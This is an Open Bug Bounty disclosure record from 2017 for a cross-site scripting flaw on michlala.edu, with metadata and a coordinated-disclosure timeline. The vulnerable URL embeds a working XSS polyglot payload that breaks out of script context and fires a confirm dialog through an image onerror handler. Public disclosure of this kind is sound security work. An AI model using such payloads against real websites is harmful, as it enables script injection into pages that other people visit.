michlala.edu XSS vulnerability

2017-05-15T19:38:00
ID OBB:237602
Type openbugbounty
Reporter xssbuddy
Modified 2017-05-23T11:15:00

Description

Vulnerable URL:
http://www.michlala.edu/M.ed/courses%3C!%27/*%22/*/%27/*/%22/*--%3E%3C/Script%3E%3CImage%20Srcset=K%20*/;%20Onerror=confirm%60OPENBUGBOUNTY%60%20//%3E/luach_limudim.asp/#
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1192705
VIP website status:| No
Check michlala.edu SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 15 May, 2017 19:38 GMT
Vulnerability existence verified and confirmed| 16 May, 2017 10:44 GMT
Generic security notifications sent to website owner| 16 May, 2017 10:44 GMT
Vulnerability details disclosed by researcher| 23 May, 2017 11:15 GMT